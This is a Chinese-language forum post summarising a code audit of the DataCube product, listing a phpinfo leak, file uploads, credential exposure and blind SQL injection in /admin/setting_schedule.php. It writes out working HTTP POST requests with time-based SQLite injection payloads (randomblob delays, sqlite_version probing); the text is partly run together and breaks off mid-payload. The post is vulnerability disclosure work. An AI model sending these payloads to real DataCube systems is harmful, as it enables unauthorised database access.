DataCube 毛病小结
在这里分享一下通过拖取 DataCube 代码审计后发现的一些毛病,包括前台的文件上传,信息泄暴露账号密码,背景的文件上传。当然还有部分 SQL 注入毛病,由于 DataCube 采用的是 SQLite 的数据库,所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的毛病,可以互相讨论。phpinfo 泄漏
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536552.png
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536553.png
SQL注入
无回显的SQL注入
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536554.png
/DataCube/www/admin/setting_schedule.php
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536555.png
SQLite 没有sleep()函数,但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数,它的作用是生成一个指定长度的随机二进制字符串。
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536556.png
正常请求时间
POST /admin/setting_schedule.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536557.png
延时相应
判定对应的 SQLite 的版本号
POST /admin/setting_schedule.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closedatetime=-1'or+(case+when(substr(sqlite_version(),1,1)
页:
[1]